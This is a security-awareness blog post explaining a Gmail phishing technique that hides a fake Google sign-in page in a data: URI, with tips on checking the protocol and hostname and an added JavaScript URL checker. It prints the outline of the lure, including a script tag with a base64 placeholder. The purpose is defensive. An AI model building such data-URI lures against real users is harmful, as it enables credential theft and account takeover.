Beware! Latest Smartest and Highly Effective Gmail Phishing Technique
Gmail phishing is one of the most common methods hackers use to steal users' passwords. Recently, an advanced Gmail phishing attack was uncovered by YouTuber Tom Scott.
He said "This is the closest I've ever come to falling for a Gmail phishing attack. If it hadn't been for my high-DPI screen making the image fuzzy…"
How does this Gmail phishing attack work?
1. The attacker sends an email with a malicious attachment to your Gmail account.
2. When you click the attachment, a new tab opens and you are asked to sign in to Gmail again. The page looks like Google's original login page.
You can identify a phishing page by looking at its URL: the original web page starts with https://, but most phishing pages do not adopt HTTPS (also known as HTTP over TLS, or Transport Layer Security).
In this attack the URL starts with data:text/html,https://accounts.google.com instead of https://accounts.google.com.
3. Once you complete the sign-in, your account has been hacked.
4. The attackers log in to your account immediately once they get your account password. Once they have access to your account, they also have full access to all your emails, both sent and received, and may download the whole lot.
How to protect yourself from phishing attack
1. Every time you sign in to any service, look at the browser address bar and ensure that the URL starts with https://.
2. Verify the protocol, then verify the hostname.
3. Do not click on hyperlinks or links shared in the media, Facebook, WhatsApp or other social networking sites, especially when the URL is shortened, like: is.gd/ZsSBmY, bit.ly/2aEcPwH, goo.gl/AhPr20, bit.do/dogmail.
Technical Details:
This phishing technique uses something called a ‘data URI’ to include a complete file in the browser location bar. A data URI is a base64 encoded string that represents a file. What you see in the address bar as ‘data:text/html…..’ is actually a very long string of text (the base64-encoded version).
data:text/html,https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue <script src=data:text/html;base64,…></script>
Data URIs are composed of four parts: a prefix (data:), a MIME type indicating the type of data, an optional base64 token if non-textual, and the data itself:
data:[<mediatype>][;base64],<data>
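The "verify the protocol, then verify the hostname" advice and the data URI layout above can be turned into a small check. This is an added example, not code from the original post or its sources; the function names, the expected host constant and the sample lure are constructed for illustration.

```javascript
// Added example: function names and the sample URL are hypothetical,
// constructed for this page; the base64 part is a harmless placeholder.
const EXPECTED_HOST = "accounts.google.com";

// Split a data URI into its parts: data:[<mediatype>][;base64],<data>
function parseDataUri(uri) {
  const m = /^data:([^,]*),([\s\S]*)$/i.exec(uri.trim());
  if (!m) return null;
  const params = m[1].split(";").map((p) => p.trim().toLowerCase());
  const isBase64 = params.length > 1 && params[params.length - 1] === "base64";
  return { mediaType: params[0] || "text/plain", isBase64, data: m[2] };
}

// Return the decoded body of a data URI, or the raw data if decoding fails.
function decodeData({ isBase64, data }) {
  try {
    return isBase64 ? atob(data) : decodeURIComponent(data);
  } catch {
    return data;
  }
}

// Verify the protocol first, then the hostname, and explain any failure.
function checkSignInUrl(addressBar, expectedHost = EXPECTED_HOST) {
  let url;
  try {
    url = new URL(addressBar.trim());
  } catch {
    return { safe: false, scheme: null, findings: ["not a parseable URL"] };
  }
  const findings = [];
  if (url.protocol !== "https:") findings.push(`scheme is ${url.protocol} not https:`);
  if (url.protocol === "data:") {
    const parsed = parseDataUri(addressBar);
    const body = parsed ? decodeData(parsed) : "";
    if (body.includes(`https://${expectedHost}`))
      findings.push("inline content imitates the expected sign-in URL");
    if (/<script\b/i.test(body)) findings.push("inline content carries a script element");
  } else if (url.hostname !== expectedHost) {
    findings.push(`hostname is ${url.hostname}, expected ${expectedHost}`);
  }
  return { safe: findings.length === 0, scheme: url.protocol, findings };
}

// Constructed lure in the shape shown on this page (padding hides the script).
const SAMPLE_LURE =
  "data:text/html,https://accounts.google.com/ServiceLogin?service=mail" +
  " ".repeat(40) + "<script src=data:text/html;base64,Y29uc3RydWN0ZWQ=></script>";
console.log(checkSignInUrl(SAMPLE_LURE));
```

A data: URL has no hostname at all, so the check fails on the scheme before the familiar-looking text after the comma is ever compared against the expected host.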
Source Websites
- https://www.wordfence.com/blog/2017/01/gmail-phishing-data-uri/#officialupdate
- Hacking Story : "I just got phished" http://blog.greggman.com/blog/getting-phished/